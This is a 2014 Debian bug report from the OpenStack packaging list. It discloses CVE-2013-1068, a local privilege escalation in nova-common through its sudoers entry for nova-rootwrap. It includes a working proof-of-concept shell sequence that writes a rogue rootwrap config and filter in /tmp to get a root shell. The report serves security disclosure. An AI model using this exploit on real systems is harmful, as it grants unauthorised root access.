[PKG-Openstack-devel] Bug#753579: nova: CVE-2013-1068: local privilege escalation
Henri Salo
henri at nerv.fi
Thu Jul 3 09:38:42 UTC 2014
Package: nova-common
Version: 2014.1.1-1
Severity: grave
Tags: security, confirmed
After installing nova-common file /etc/sudoers.d/nova-common is created. If
/etc/sudoers contains "#includedir /etc/sudoers.d" nova is vulnerable to
CVE-2013-1068 local privilege escalation. Vulnerability does not need working
OpenStack installation. If I am correct OpenStack does not work without
includedir configuration so it might be usually enabled in OpenStack
instances.
PoC: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/1185019
"""
echo [DEFAULT] >/tmp/my-rootwrap.conf
echo filters_path=/tmp/my-filters.d >>/tmp/my-rootwrap.conf
mkdir /tmp/my-filters.d
echo [Filters] >/tmp/my-filters.d/my.filters
echo my-shell: CommandFilter, /bin/sh, root >>/tmp/my-filters.d/my.filters
sudo nova-rootwrap /tmp/my-rootwrap.conf sh
id
"""
-- System Information:
Debian Release: 7.5
APT prefers stable
APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 3.2.0-4-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8)
Shell: /bin/sh linked to /bin/dash
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 198 bytes
Desc: Digital signature
URL: <http://lists.alioth.debian.org/pipermail/openstack-devel/attachments/20140703/5461a28f/attachment.sig>
More information about the Openstack-devel
mailing list